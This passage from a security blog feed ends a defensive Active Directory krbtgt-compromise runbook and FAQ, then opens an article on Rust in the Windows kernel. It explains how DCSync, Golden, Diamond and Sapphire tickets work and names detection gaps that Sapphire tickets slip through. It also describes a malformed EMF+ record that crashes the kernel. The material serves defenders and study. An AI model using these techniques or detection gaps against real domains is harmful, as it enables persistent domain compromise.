&lt;p&gt;Ship the MDI Suspected-Golden-Ticket alert family plus the DCSync alert (External ID 2006) [@mdi-classic][@mdi-credential]. Confirm the Suspected-Golden-Ticket alerts (2009, 2013, 2022, 2027, 2032, 2040) are active for every domain controller MDI is deployed against. Configure Microsoft Sentinel content-pack rules covering T1558.001 Golden Ticket and Kerberos-anomaly patterns (not the T1558.003 Kerberoasting rules, which target service-account SPNs and are not a krbtgt detection asset). Configure Splunk T1558.001 detection [@splunk-7d9] and tune the encryption-type baseline against legacy systems that legitimately negotiate RC4 (or, better, retire those systems).&lt;/p&gt;
&lt;p&gt;Ingest BloodHound for posture-graph visibility. Configure regular collections (the default is weekly) so the DCSync edge list stays current as ACLs change. Cross-reference the DCSync edge inventory against the actual administrative role assignments quarterly.&lt;/p&gt;
&lt;h3&gt;Lane 3: confirmed-compromise response&lt;/h3&gt;
&lt;p&gt;When MDI or Sentinel surfaces a confirmed krbtgt compromise -- DCSync extraction observed against a writeable DC, or a Suspected-Golden-Ticket alert with concrete supporting evidence -- the response runs in two parallel tracks. The cryptographic track executes the two-reset rotation: reset the krbtgt password (replicate, verify), wait at least 10 hours, reset again (replicate, verify) [@ms-forest-recovery]. The operational track executes the Domain-of-Thrones Part II rotation surface [@specterops-dot2]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;AD CS template review covering the ESC1 through ESC8 abuse classes [@certified-pre-owned]; replace or restrict templates with &lt;code&gt;EnrolleeSuppliesSubject&lt;/code&gt;, broad &lt;code&gt;Enroll&lt;/code&gt; permissions, or weak EKU restrictions.&lt;/li&gt;
&lt;li&gt;SID History audit (&lt;code&gt;Get-ADUser -Filter * -Properties SIDHistory&lt;/code&gt;); investigate every account whose SID History contains a Domain Admins or Enterprise Admins SID.&lt;/li&gt;
&lt;li&gt;AdminSDHolder ACL audit; reset Protected Group inherited ACLs and verify the SDProp runs cleanly.&lt;/li&gt;
&lt;li&gt;Machine-account secret rotation, especially for Tier-0 servers.&lt;/li&gt;
&lt;li&gt;KDS root-key rotation followed by gMSA password cycling.&lt;/li&gt;
&lt;li&gt;Trust-key rotation for every inbound and outbound trust.&lt;/li&gt;
&lt;li&gt;DSRM password rotation on every writeable DC.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;After both tracks complete, re-baseline detection: the post-incident DC event-log baseline will differ from the pre-incident baseline, and detection thresholds may need re-tuning to suppress the resulting alerts.&lt;/p&gt;

The reference automation runs against the krbtgt SID specifically, not the friendly name, to avoid any ambiguity with a renamed object. Conceptually: `Set-ADAccountPassword -Identity (Get-ADUser -Filter &quot;objectSID -like &apos;*-502&apos;&quot;) -Reset -NewPassword (Convert-To-SecureString (New-RandomPassword) -AsPlainText -Force)`. The Microsoft Learn PowerShell reference for the `Set-ADAccountPassword` cmdlet documents the `-Reset` plus `-NewPassword` parameters used here [@ms-set-adaccountpassword]. The `New-KrbtgtKeys.ps1` script wraps this with replication checks and a confirmation prompt [@new-krbtgt-keys]. Production runbooks always include a pre-check that `Get-ADReplicationFailure` returns no failures before any reset is issued.
&lt;h3&gt;Lane 4: what does NOT work&lt;/h3&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &lt;strong&gt;Renaming krbtgt.&lt;/strong&gt; The RID 502 binding is what the KDC derives from, not the &lt;code&gt;sAMAccountName&lt;/code&gt;. The KDC service does not care about the friendly name. &lt;strong&gt;Disabling krbtgt.&lt;/strong&gt; The account is already disabled for interactive logon by design [@ms-default-accounts]. Toggling the field is semantically meaningless to the KDC service, which reads the long-term key directly from the directory. &lt;strong&gt;Single rotation.&lt;/strong&gt; Password-history-of-2 means a single rotation only retires the &lt;em&gt;older&lt;/em&gt; of the two keys, leaving the attacker-extracted key (which was current at compromise) still in the previous slot [@ms-forest-recovery]. The procedure must run twice. &lt;strong&gt;Treating MDI Suspected-Golden-Ticket alerts as sufficient.&lt;/strong&gt; Those alerts do not cover Diamond and Sapphire by construction. Sapphire defeats every PAC-content anomaly detection because the PAC is genuine. Confirmed-compromise response must assume the worst even when MDI is silent.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Preventive hygiene, detection deployment, confirmed-compromise response, and four traps to avoid. The FAQ that follows addresses what remains.&lt;/p&gt;
&lt;h2&gt;11. FAQ&lt;/h2&gt;

No. It retires Diamond Tickets that do not recompute the Full PAC Signature. It does nothing against tickets minted from a known krbtgt key, including Sapphire Tickets (no PAC modification) and recomputed Diamond Tickets (the attacker holds the key and can compute the new signature in the same step as the older KDC signature) [@kb5020805][@mspac].

No. See §10 Lane 4 trap #1: the RID 502 binding is what the KDC derives from, not the `sAMAccountName` [@ms-default-accounts][@ms-sids].

No. See §10 Lane 4 trap #3: password-history-of-2 keeps the previous key valid after a single rotation, so the procedure must run twice with at least `MaxTicketAge` between resets [@ms-forest-recovery][@new-krbtgt-keys].

No. See §10 Aside on why Credential Guard skips the DC: the KDC service on a writeable DC must read the krbtgt key unencrypted to issue tickets, and DCSync is a remote replication API call (DRSGetNCChanges), not a local LSASS memory scrape [@mitre-t1003006][@ms-credential-guard].

Mechanically, in-flight TGT validation requires the previous-key slot to retain validity for at least `MaxTicketAge` after each rotation. Operationally, the recommended cadence is calendar-driven preventive rotation twice a year, with incident-driven rotation as a separate workstream when confirmed compromise is detected [@ms-forest-recovery].

Indirectly. It forces all krbtgt-encrypted tickets to AES, raising the offline-crack bar against a captured ticket and reducing the surface for the Splunk RC4-Kerberos-anomaly detection family [@splunk-7d9]. It does not affect attacks against a captured krbtgt key; both AES-128 and AES-256 derivations are held in the same account and both validate forged TGTs cleanly.

Yes. Each Read-Only Domain Controller has its own `krbtgt_` account whose key signs TGTs only for principals that the RODC can authenticate [@adsec-483]. The full-domain krbtgt is the only account whose key signs TGTs accepted by every DC in the domain; compromise of an RODC-specific `krbtgt_` is a contained event whose blast radius is bounded by the RODC&apos;s allowed-list policy.

No. The IAKerb and Local KDC features shipping in recent Windows builds affect *where* KDCs run (allowing client-to-client Kerberos without a domain-joined intermediary), not the krbtgt-key trust root inside a domain. The post-RC4 enctype work affects *which* enctypes the krbtgt key derives, not the role of the key. As of [MS-KILE] revision 47.0 dated April 27, 2026, the krbtgt long-term key is still the sole trust anchor for every TGT in the domain [@mskile].
&lt;h3&gt;One sentence to take away&lt;/h3&gt;

Krbtgt rotation invalidates forged TGTs; it does not recover the systemic compromise that produced the forged TGTs in the first place.
&lt;p&gt;That is the precise sentence to keep from ten thousand words. The cryptographic question -- &quot;is the ticket valid?&quot; -- terminates at one key. The operational question -- &quot;is the domain still ours?&quot; -- never does. The 1988 design chose to make ticket validation a property of a single shared secret because that choice made the protocol simple and provably correct. The choice remains correct in 2026. What changed is the meaning of the word &lt;em&gt;compromise&lt;/em&gt;: in 1988 the threat model was a passive eavesdropper on a campus LAN; in 2026 the threat model is a remote API call that streams the secret across a &lt;code&gt;DRSGetNCChanges&lt;/code&gt; exchange. The key did not move. The attacker&apos;s reach did.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;krbtgt-the-account-that-owns-active-directory&quot; keyTerms={[
  { term: &quot;KRBTGT account&quot;, definition: &quot;The RID-502 Active Directory account whose long-term key encrypts every TGT in the domain.&quot; },
  { term: &quot;Ticket-Granting Ticket (TGT)&quot;, definition: &quot;The Kerberos credential issued at logon, encrypted under the krbtgt long-term key, that the client presents to request service tickets.&quot; },
  { term: &quot;Privilege Attribute Certificate (PAC)&quot;, definition: &quot;The Windows-specific structure inside the authorization-data field of every Kerberos ticket, carrying SIDs and signatures.&quot; },
  { term: &quot;DCSync&quot;, definition: &quot;A replication-API primitive (MITRE T1003.006) that streams account secrets including the krbtgt key from a writeable DC to any principal with replication rights.&quot; },
  { term: &quot;Golden Ticket&quot;, definition: &quot;A forged TGT minted from a held krbtgt key (MITRE T1558.001).&quot; },
  { term: &quot;Diamond Ticket&quot;, definition: &quot;A real KDC-issued TGT, decrypted with the held krbtgt key, with the PAC modified and re-signed.&quot; },
  { term: &quot;Sapphire Ticket&quot;, definition: &quot;A forged TGT containing a genuine PAC obtained via the S4U2self plus U2U Kerberos extensions.&quot; },
  { term: &quot;MaxTicketAge&quot;, definition: &quot;The Kerberos policy value bounding the lifetime of a TGT; default 10 hours in Active Directory.&quot; }
]} flashcards={[
  { front: &quot;What did the MS14-068 patch elevate the krbtgt key from and to?&quot;, back: &quot;From &apos;an important secret&apos; to &apos;the load-bearing secret of every authentication decision in the domain.&apos; The patch tied PAC integrity to a real keyed HMAC under the krbtgt key, making the krbtgt key the single secret worth attacking directly from November 2014 onward.&quot; },
  { front: &quot;Why does the Full PAC Signature not retire the primitive?&quot;, back: &quot;Because the Full PAC Signature is itself computed under the krbtgt key. An attacker who holds the key recomputes it in the same step as the older KDC signature, and Sapphire Tickets never modify the PAC at all -- so the KDC&apos;s own genuine Full PAC Signature is on the ticket by construction.&quot; },
  { front: &quot;What does the two-reset procedure do and not do?&quot;, back: &quot;It cryptographically invalidates previously-forged TGTs after the second reset replicates. It does NOT rotate the seven other secret classes an attacker with krbtgt access has typically also touched: AdminSDHolder, AD CS templates, SID History, machine-account secrets, KDS root keys, trust keys, DSRM passwords.&quot; }
]} questions={[
  { q: &quot;What makes krbtgt unique among AD trust roots?&quot;, a: &quot;Within the Kerberos trust root of a single domain, the krbtgt long-term key is the only secret whose disclosure forges TGTs for arbitrary principals, including ones that do not exist in the directory. The CA private key, KDS root key, trust keys, and DSRM passwords are other trust roots with their own blast radii, but only the krbtgt key has the forge-arbitrary-TGT property.&quot; },
  { q: &quot;Why does the two-reset procedure require at least 10 hours between resets?&quot;, a: &quot;Because the AD default MaxTicketAge is 10 hours. If the second reset lands before all TGTs issued under the now-displaced previous key have expired, those in-flight tickets fail validation when they reach a DC whose previous slot no longer holds their signing key. The 10-hour floor is a cryptographic requirement of the two-slot eviction mechanism, not a Microsoft convenience choice.&quot; },
  { q: &quot;What is the Sapphire residual, and why does no vendor analytic ship for it?&quot;, a: &quot;The Sapphire residual is the wire conjunction of an S4U2self-flagged TGS-REQ with a U2U TGS-REQ addressing the same TGT. No vendor ships a default-enabled analytic for this signal as of May 2026 because the engineering work to package it across SIEM platforms has not been done. The signal exists; the analytic is the engineering gap.&quot; },
  { q: &quot;Name three secret classes that survive krbtgt rotation.&quot;, a: &quot;Three of seven: AD CS root CA private key (and any ESC-class template backdoors), KDS root key (used to derive gMSA passwords), inter-domain trust keys (used to bridge Kerberos trust across domains). The remaining four from the Domain-of-Thrones rotation list: AdminSDHolder ACL edits, SID History entries, machine-account secrets, DSRM passwords on writeable DCs.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>active-directory</category><category>kerberos</category><category>krbtgt</category><category>security</category><category>golden-ticket</category><category>diamond-ticket</category><category>sapphire-ticket</category><category>windows-server</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Rust in the Windows Kernel: A Field Guide to the 2024-2026 Memory-Safety Refit</title><link>https://paragmali.com/blog/rust-in-the-windows-kernel-a-field-guide-to-the-2024-2026-me/</link><guid isPermaLink="true">https://paragmali.com/blog/rust-in-the-windows-kernel-a-field-guide-to-the-2024-2026-me/</guid><description>Rust ships in the Windows 11 kernel today. A primary-sourced field guide to what actually shipped from BlueHat IL 2019 through 24H2 in 2026, and what did not.</description><pubDate>Sat, 23 May 2026 00:00:00 GMT</pubDate><content:encoded>
**Rust ships in the Windows kernel today.** The binary is `%SystemRoot%\System32\win32kbase_rs.sys`, first surfaced in Insider Preview Build 25905 on 12 July 2023 and most recently in the news through Check Point Research&apos;s May 2025 &quot;Denial of Fuzzing&quot; disclosure. The realistic ten-year trajectory is **not** a Windows rewrite. It is &quot;memory-safe by default for newly written code&quot; plus targeted rewrites of high-blast-radius modules, with the unsafe-FFI boundary as the irreducible audit frontier. This article is a primary-sourced field guide to what actually shipped from BlueHat IL 2019 through Windows 11 24H2 in 2026, what did not, and what the next decade looks like.
&lt;h2&gt;1. The Blue Screen That Wasn&apos;t a Bug&lt;/h2&gt;
&lt;p&gt;On 28 May 2025, Microsoft shipped KB5058499 to patch a kernel bug in Windows 11 24H2 [@kb5058499]. The bug was an out-of-bounds array access in a Rust function called &lt;code&gt;region_from_path_mut()&lt;/code&gt; inside the binary &lt;code&gt;%SystemRoot%\System32\win32kbase_rs.sys&lt;/code&gt; [@cybersecuritynews]. Rust correctly detected the access. Because the detection fired at high IRQL inside a kernel binary compiled with &lt;code&gt;panic = &quot;abort&quot;&lt;/code&gt;, the response was a system-wide blue screen [@checkpoint-dof].&lt;/p&gt;
&lt;p&gt;Read that again. &lt;em&gt;Rust&lt;/em&gt;. In &lt;code&gt;ntoskrnl&lt;/code&gt;&apos;s neighbourhood. In production. Detecting a memory-safety violation. Panicking. Bugchecking the box.&lt;/p&gt;

The class of programming error -- buffer overflow, use-after-free, type confusion, integer overflow, double-free, uninitialised read -- where unsafe memory access leads to undefined behaviour. For two decades the Microsoft Security Response Center has reported that roughly seventy percent of Microsoft&apos;s CVE-assigned vulnerabilities come from this class.

The first Windows kernel binary written in Rust. It contains the Win32k GDI region and shape engine, and after 2025 includes portions of the EMF and EMF+ metafile parsing path. The `_rs` suffix is Microsoft&apos;s internal convention for Rust-implemented kernel binaries. You can verify the file exists on any modern Windows 11 install by checking `%SystemRoot%\System32\win32kbase_rs.sys`.The first public ship was Windows 11 Canary-channel Insider Preview Build 25905 on 12 July 2023. The Windows Insider blog called out the change explicitly: &quot;This preview shipped with an early implementation of critical kernel features in safe Rust&quot; [@insider-25905].
&lt;p&gt;The Check Point Research write-up tells the story tightly [@checkpoint-dof]. A handcrafted Enhanced Metafile Format Plus (EMF+) record -- specifically an &lt;code&gt;EmfPlusDrawBeziers&lt;/code&gt; shape with a mismatched point count -- arrives at the kernel by way of a normal-looking &lt;code&gt;NtGdiSelectClipPath&lt;/code&gt; syscall. The metafile parser hands the malformed point array to &lt;code&gt;region_from_path_mut()&lt;/code&gt;, the Rust function that converts a Bezier path into a clipping region. Indexing into the array, Rust observes the index is out of bounds. Safe Rust&apos;s bounds check fires. &lt;code&gt;core::panicking::panic_bounds_check&lt;/code&gt; runs. And because the binary lives in kernel mode, the panic does not unwind: it aborts [@esecurityplanet]. The bugcheck code is &lt;code&gt;SYSTEM_SERVICE_EXCEPTION&lt;/code&gt; [@cybersecuritynews].&lt;/p&gt;

The Windows kernel&apos;s per-CPU priority level, ranging from PASSIVE_LEVEL up through DIRQL. At IRQL ≥ DISPATCH_LEVEL the scheduler cannot run, paged memory cannot be touched, and almost no recovery path is available. A panic at high IRQL has nowhere to go except the system-wide bugcheck.

The Rust compilation profile setting that converts any runtime panic into an immediate process abort rather than stack unwinding. It is mandatory for `no_std` kernel binaries because there is no unwinder, no `std::panic::catch_unwind`, and no way to clean up locks, allocations, or interrupt state held at the point of panic.
&lt;p&gt;Microsoft classified the issue as a moderate-severity denial of service. The patch tightened the bounds check upstream, kept the Rust panic as the last-resort backstop, and shipped on. There is no CVE-2025 RCE here, no privilege escalation, no infoleak: this Rust panic was the security boundary doing exactly what it was designed to do, and the price was a controlled BSOD rather than a memory-corruption primitive in attacker hands [@checkpoint-dof].&lt;/p&gt;
&lt;p&gt;That single bug carries two non-obvious claims that the rest of the article will unpack. First, this is the largest &lt;em&gt;language-level&lt;/em&gt; memory-safety refit in NT&apos;s roughly thirty-three-year history, distinct in kind from &lt;code&gt;/GS&lt;/code&gt; stack cookies, Address Space Layout Randomization (ASLR), Control Flow Guard (CFG), Hypervisor-protected Code Integrity (HVCI), or Intel Control-flow Enforcement Technology (CET). All of those are mitigations that raise the &lt;em&gt;cost&lt;/em&gt; of exploiting a memory-safety bug. Rust eliminates the bug &lt;em&gt;class&lt;/em&gt; in the modules it covers. That is a different kind of fix.&lt;/p&gt;
&lt;p&gt;Second, the realistic ten-year shape is &quot;memory-safe by default for new code,&quot; not &quot;rewrite Windows.&quot; Microsoft&apos;s distinguished engineer Galen Hunt got in trouble in December 2025 for a LinkedIn post about an internal &quot;1 engineer, 1 month, 1 million lines of code&quot; research target [@register-2025-12-24]. Frank X. Shaw, head of Microsoft&apos;s communications, confirmed within days that the company has no plan to rewrite Windows 11 using AI [@windowslatest-galen; @infoworld-not-rewriting]. The trajectory is policy, not project.&lt;/p&gt;
&lt;p&gt;So: Rust in the Windows kernel. Real binary, real BSOD, real patch, real timeline. &lt;em&gt;How did we get here, and why is a Rust-detected memory-safety violation still a system-wide crash?&lt;/em&gt;&lt;/p&gt;
&lt;h2&gt;2. The 70-Percent Number and Why Mitigations Plateaued&lt;/h2&gt;
&lt;p&gt;In early February 2019, in Tel Aviv, Matt Miller stood up at BlueHat IL and asked the question that anchored the next seven years of Microsoft&apos;s security strategy. After two decades of Microsoft Security Response Center (MSRC) triage, what fraction of vulnerabilities are still memory-safety bugs? His answer, drawn from a decade of CVE data: about seventy percent [@miller-bluehat-2019; @infoq-mitigating].&lt;/p&gt;
&lt;p&gt;The number was not new in 2019. The MSRC&apos;s own July 2019 essay re-stated it in plain prose: &quot;approximately 70% of the vulnerabilities Microsoft assigns a CVE each year continue to be memory safety issues&quot; [@msrc-proactive-2019]. It had not moved in a decade despite &lt;code&gt;/GS&lt;/code&gt; stack cookies, Data Execution Prevention (DEP), ASLR, CFG, &lt;a href=&quot;https://paragmali.com/blog/wdac--hvci-code-integrity-at-every-layer-in-windows/&quot; rel=&quot;noopener&quot;&gt;Hypervisor-protected Code Integrity&lt;/a&gt;, and Intel CET [@msrc-safer-2019]. Mark Russinovich repeated the number at RustConf 2025 in Seattle: &quot;about 70% over the past two decades&quot; [@newstack-russinovich].&lt;/p&gt;
&lt;p&gt;A note on attribution. The originating talk was Miller&apos;s, not David Weston&apos;s. The press cycle following Weston&apos;s 2023 BlueHat IL announcement often credited him with the 70% figure. Weston and Russinovich operationalised it; Miller and the MSRC published it. The deck is in the &lt;code&gt;microsoft/MSRC-Security-Research&lt;/code&gt; repository on GitHub under the &lt;code&gt;2019_02_BlueHatIL&lt;/code&gt; directory; you can read it today [@miller-bluehat-2019].Miller was MSRC&apos;s Partner Security Software Engineer at the time of the talk. He has since moved on, but Microsoft kept the BlueHat IL 2019 deck in the public security-research repo as a primary artefact for the figure.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The 70% figure was roughly the same in 2009 as in 2019. The mitigations stack had absorbed two decades of compiler, OS, and hardware investment without moving the curve. That is why the question shifted from &quot;how do we make exploitation harder&quot; to &quot;how do we eliminate the bug class itself.&quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;To see why the curve stayed flat, walk the supersession history. Each generation of mitigation closed a specific exploitation primitive. None closed a bug class.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;/GS&lt;/code&gt; (Visual Studio .NET 2002/2003) inserted a per-function stack canary to detect linear stack-buffer overruns that overwrote a saved return address [@learn-gs]. It defended only the prologue-epilogue window of stack frames. Heap overflows, non-adjacent stack writes, type confusion, and info-leak-then-corrupt all walked around it.&lt;/p&gt;
&lt;p&gt;DEP / NX (Windows XP Service Pack 2, 2004) marked data pages non-executable so attackers could not jump into a buffer they had written [@learn-dep]. Hovav Shacham&apos;s 2007 paper on Return-Oriented Programming showed how to compose Turing-complete payloads from existing executable code without ever introducing a new instruction [@shacham-rop-2007]. DEP raised exploit cost. It did not close the bug class.&lt;/p&gt;
&lt;p&gt;ASLR (Windows Vista, 2006) randomised module, heap, and stack base addresses so attackers could not pre-compute jump targets [@learn-aslr]. The defeat was a single information-disclosure primitive away. Every modern Windows exploit chain begins with an infoleak.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://paragmali.com/blog/control-flow-integrity-on-windows-cfg-xfg-and-the-cet-shadow/&quot; rel=&quot;noopener&quot;&gt;CFG (Windows 8.1, 2014)&lt;/a&gt; restricted indirect calls to a per-binary set of valid call targets [@learn-cfg]. XFG (announced at BlueHat Shanghai 2019, &lt;code&gt;/guard:xfg&lt;/code&gt; compiler support shipped in MSVC in 2020, available in Windows 11 from 2021 as an opt-in compile-time flag, not enabled by default for third-party binaries) tightened that to type-signed indirect call sites [@quarkslab-xfg; @mcgarr-examining-xfg]. CET shadow stack (broadly shipping in Windows 11 in 2021) sealed the return-address half of the same family on hardware that supports it [@msft-cet-shadow]. All three are forms of Control-Flow Integrity, and all three by construction defend the &lt;em&gt;control-flow graph&lt;/em&gt; only.&lt;/p&gt;

The family of compile-time and hardware mitigations -- including CFG, XFG, and CET shadow stack -- that restricts indirect control transfers (jumps, calls, returns) to a per-binary set of valid targets. CFI is, by construction, blind to attacks that corrupt program data without changing the control-flow graph.

A class of exploitation in which an attacker corrupts program *data* without changing the control-flow graph. Hu et al. proved at IEEE Symposium on Security and Privacy 2016 that DOP is Turing-complete -- meaning an attacker who can corrupt the right pieces of data can compute arbitrary functions while the protected program faithfully follows its original control flow [@hu-dop-2016].
&lt;p&gt;That theorem is the structural ceiling. If DOP can express arbitrary computation while the program&apos;s control-flow graph remains unviolated, then no amount of CFI can close the bug class. Every CFI variant could be implemented perfectly tomorrow and the 70% figure would still not move. The MSRC&apos;s July 2019 &quot;We need a safer systems programming language&quot; essay said the quiet part aloud: &quot;no matter the amount of mitigations put in place, it is near impossible to write memory-safe code using traditional systems-level programming languages at scale&quot; [@msrc-safer-2019].&lt;/p&gt;

The MSRC essay -- written by Matt Miller&apos;s team in the same July 2019 cycle as the BlueHat IL talk -- ends with a striking concession: &quot;rather than providing guidance and tools for addressing flaws, we should strive to prevent the developer from introducing the flaws in the first place&quot; [@msrc-safer-2019]. That sentence is the strategic pivot. After two decades of *mitigation* investment, Microsoft publicly accepted that mitigations could not solve the problem alone. The only structural fixes are at the language layer (eliminate the unsafe primitives) or the hardware layer (enforce safety at every dereference). Hu et al.&apos;s DOP theorem was the formal moment &quot;mitigations are necessary but not sufficient&quot; stopped being a slogan and became math.
&lt;p&gt;The supersession trace is compact enough to fit in one table.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Generation&lt;/th&gt;
&lt;th&gt;Mitigation&lt;/th&gt;
&lt;th&gt;Year&lt;/th&gt;
&lt;th&gt;Closes&lt;/th&gt;
&lt;th&gt;Defeated by&lt;/th&gt;
&lt;th&gt;Residual bug class&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;G1&lt;/td&gt;
&lt;td&gt;&lt;code&gt;/GS&lt;/code&gt; stack canary&lt;/td&gt;
&lt;td&gt;2002/2003&lt;/td&gt;
&lt;td&gt;Linear stack overruns past return address&lt;/td&gt;
&lt;td&gt;Heap overflows, non-adjacent writes, infoleaks&lt;/td&gt;
&lt;td&gt;Memory corruption (all classes except narrow stack)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G2&lt;/td&gt;
&lt;td&gt;DEP / NX&lt;/td&gt;
&lt;td&gt;2004&lt;/td&gt;
&lt;td&gt;Code injection into data pages&lt;/td&gt;
&lt;td&gt;ROP (Shacham 2007)&lt;/td&gt;
&lt;td&gt;Memory corruption (control transferred to existing code)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G3&lt;/td&gt;
&lt;td&gt;ASLR&lt;/td&gt;
&lt;td&gt;2006&lt;/td&gt;
&lt;td&gt;Pre-computed gadget addresses&lt;/td&gt;
&lt;td&gt;Information-disclosure primitives&lt;/td&gt;
&lt;td&gt;Memory corruption (after infoleak)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G4&lt;/td&gt;
&lt;td&gt;CFG (default) / XFG (opt-in)&lt;/td&gt;
&lt;td&gt;2014 / 2021&lt;/td&gt;
&lt;td&gt;Arbitrary indirect call targets&lt;/td&gt;
&lt;td&gt;Data-oriented programming (Hu 2016)&lt;/td&gt;
&lt;td&gt;Data-only memory corruption&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G4&lt;/td&gt;
&lt;td&gt;CET shadow stack&lt;/td&gt;
&lt;td&gt;2021&lt;/td&gt;
&lt;td&gt;Return-address rewrites&lt;/td&gt;
&lt;td&gt;DOP, non-return CFI bypass&lt;/td&gt;
&lt;td&gt;Data-only memory corruption&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G5&lt;/td&gt;
&lt;td&gt;HVCI, Driver Verifier, WDAC&lt;/td&gt;
&lt;td&gt;2015+&lt;/td&gt;
&lt;td&gt;Unsigned/unverified driver code&lt;/td&gt;
&lt;td&gt;Memory corruption in signed drivers&lt;/td&gt;
&lt;td&gt;Memory corruption in trusted code&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G6&lt;/td&gt;
&lt;td&gt;Rust in the Windows kernel&lt;/td&gt;
&lt;td&gt;2023+&lt;/td&gt;
&lt;td&gt;The bug class itself, in covered modules&lt;/td&gt;
&lt;td&gt;Bugs in &lt;code&gt;unsafe&lt;/code&gt; blocks; panic-as-BSOD&lt;/td&gt;
&lt;td&gt;Logic bugs, FFI invariant violations, DoS via panic&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The cross-vendor data agrees. Chromium&apos;s own engineering reports peg roughly 70% of high-severity browser bugs as memory safety. Google&apos;s Android security team published in September 2024 that memory-safety vulnerabilities in Android dropped from 76% of total in 2019 to 24% in 2024 -- not by rewriting existing C and C++, but by writing &lt;em&gt;new&lt;/em&gt; code in Rust [@google-android-2024]. The structural fix shows up in the data when it ships.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Mitigations bound the &lt;em&gt;cost&lt;/em&gt; of exploitation. Only a memory-safe language or capability hardware bounds the &lt;em&gt;size of the bug class itself&lt;/em&gt;. After two decades, the 70% figure had not moved. The structural answer was no longer optional.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If the structural fix had to come from the language layer, why did Microsoft choose Rust -- and not the safer-systems-language it had been researching since 2006?&lt;/p&gt;

flowchart LR
  GS[&quot;/GS stack cookie&lt;br /&gt;2002 / 2003&quot;] --&amp;gt; DEP[&quot;DEP / NX&lt;br /&gt;2004&quot;]
  DEP --&amp;gt; ASLR[&quot;ASLR&lt;br /&gt;2006&quot;]
  ASLR --&amp;gt; CFG[&quot;CFG / XFG&lt;br /&gt;2014 / 2021&quot;]
  CFG --&amp;gt; CET[&quot;CET shadow stack&lt;br /&gt;2021&quot;]
  CFG --&amp;gt; HVCI[&quot;HVCI + WDAC&lt;br /&gt;2015+&quot;]
  CET --&amp;gt; Rust[&quot;win32kbase_rs.sys&lt;br /&gt;Rust in kernel&lt;br /&gt;2023&quot;]
  HVCI --&amp;gt; Rust
  ASLR -.-&amp;gt;|&quot;defeated by infoleaks&quot;| Bypass1[&quot;arbitrary primitives&quot;]
  CFG -.-&amp;gt;|&quot;defeated by DOP, Hu 2016&quot;| Bypass2[&quot;data-only attacks&quot;]
  Rust ==&amp;gt;|&quot;closes the bug class&lt;br /&gt;in covered modules&quot;| Win[&quot;memory-safe by default&lt;br /&gt;for new code&quot;]
&lt;h2&gt;3. Verona, windows-rs, and the Long Approach&lt;/h2&gt;
&lt;p&gt;Microsoft&apos;s first publicly-named safer-systems-language experiment was not Rust. It was Singularity, the Microsoft Research operating system Galen Hunt and Jim Larus described in &lt;em&gt;ACM SIGOPS Operating Systems Review&lt;/em&gt; in April 2007 [@singularity]. Singularity was built in Sing#, a dialect of C# extended with software-isolated processes, contract-based channels, and manifest-based programs that the OS verified at install time. The idea was the same as Rust&apos;s: prove memory safety at the language level so the runtime cost of process isolation becomes negligible. Singularity worked. It also stayed in the lab.&lt;/p&gt;
&lt;p&gt;A decade later, in 2019, Microsoft Research open-sourced &lt;em&gt;Project Verona&lt;/em&gt; at &lt;code&gt;github.com/microsoft/verona&lt;/code&gt;, a collaboration with Imperial College London and Uppsala University [@verona-github; @verona-msr]. Verona explores &lt;em&gt;concurrent ownership&lt;/em&gt; in regions: where Rust&apos;s borrow checker tracks one owner per object, Verona lets multiple objects share a single region-level ownership lifetime, simplifying some concurrent patterns at the cost of additional runtime structure.Verona&apos;s region-based concurrent ownership lets multiple objects share a single ownership lifetime. The academic publications appear at OOPSLA and PLDI. The repository README is explicit that the project is &quot;not ready to be used outside of research.&quot; Verona remains alive as research. It has not been productised.&lt;/p&gt;
&lt;p&gt;So why did Rust win against two memory-safe languages of Microsoft&apos;s own design?&lt;/p&gt;
&lt;p&gt;The answer is &lt;em&gt;adoption&lt;/em&gt;. Singularity and Verona were technically interesting; the community around them was Microsoft Research. Rust came with crates.io, a stable compiler, a community of working programmers, a foreign-function-interface story, and -- as of January 2020 -- official Microsoft-maintained bindings. Microsoft Research kept its own safe-systems-language line for the questions Rust does not answer, and Microsoft the platform vendor met developers where they already were.&lt;/p&gt;
&lt;p&gt;The pivot to Rust shows up in three threads.&lt;/p&gt;
